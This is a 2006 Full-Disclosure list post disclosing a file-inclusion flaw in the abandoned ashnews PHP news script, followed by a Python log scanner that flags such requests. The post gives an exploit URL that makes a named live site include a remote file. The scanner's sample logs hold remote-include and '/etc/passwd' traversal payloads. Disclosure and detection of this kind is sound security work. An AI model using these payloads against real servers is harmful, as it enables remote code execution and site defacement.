Re: [Full-disclosure] ashnews Cross-Site Scripting Vulnerability
From: DanB-FD (dan-fd f-box.org)
Date: Tue Jan 31 2006 - 04:43:19 CST
Hi,
Dan B UK wrote:
> Due to the nature of the issue I am not disclosing the detail of it
> until the writer of the software has updated it; maybe you could have
> waited??
>
> A vulnerability that allows privileges of the apache user within the
> limitations of how much PHP has been locked down.
Since the author of the product has got back to me with the following I
think it is ok to disclose the issue now.
"That is a known error. Unfortunately I have completely abandoned
ashnews. In fact, I have been neglecting taking it down completely which
I am going to do right now. - Derek"
The issue is in the handling of $pathtoashnews: it is not validated
before being used by the script, allowing remote or local file inclusion.
e.g.:
http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc?
( The ? is required to make the remote server (f-box.org) ignore the
string that is appended to the variable $pathtoashnews )
( The website that is in the example above has already been defaced! )
Cheers,
DanB UK.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
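
A log check for the pattern this advisory describes, as an added example that is not part of the original post: it scans web-server access-log lines for requests that set `pathtoashnews` to a URL or to a traversal or absolute path. The log lines, addresses and host names are constructed samples, and the `classify` and `scan` names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "pathtoashnews"  # PHP variable names are case-sensitive
# Request field of a Common/Combined Log Format line
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# "scheme:" (http, ftp, php, data, ...) or protocol-relative "//host";
# two or more scheme characters so a Windows drive letter is not matched
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.I)

def classify(value):
    """Return 'remote', 'local' or None for one decoded parameter value."""
    if REMOTE_RE.match(value):
        return "remote"
    segments = value.replace("\\", "/").split("/")
    if ".." in segments or "\x00" in value or value.startswith("/"):
        return "local"
    return None

def scan(lines):
    """Return (line_number, kind, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key != PARAM:
                continue
            value = unquote(value)  # second pass catches double encoding
            kind = classify(value)
            if kind:
                hits.append((number, kind, value))
    return hits

# Constructed sample log lines (documentation addresses and host names)
SAMPLE = [
    '192.0.2.10 - - [31/Jan/2006:04:10:01 +0000] "GET /news/ashnews.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/Jan/2006:04:11:45 +0000] "GET /news/ashnews.php?pathtoashnews=http://attacker.example/inc.inc? HTTP/1.0" 200 312',
    '198.51.100.7 - - [31/Jan/2006:04:12:02 +0000] "GET /news/ashnews.php?pathtoashnews=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.0" 200 1840',
    '192.0.2.33 - - [31/Jan/2006:04:13:30 +0000] "GET /news/ashnews.php?id=4 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [31/Jan/2006:04:15:11 +0000] "GET /news/ashnews.php?pathtoashnews=hTTp%3A%2F%2Fattacker.example%2Fx.txt%3F HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, kind, value in scan(SAMPLE):
        print(f"line {number}: {kind} inclusion attempt: {value!r}")
```

Access logs record only the query string, so a value sent in a POST body would not be seen by this check.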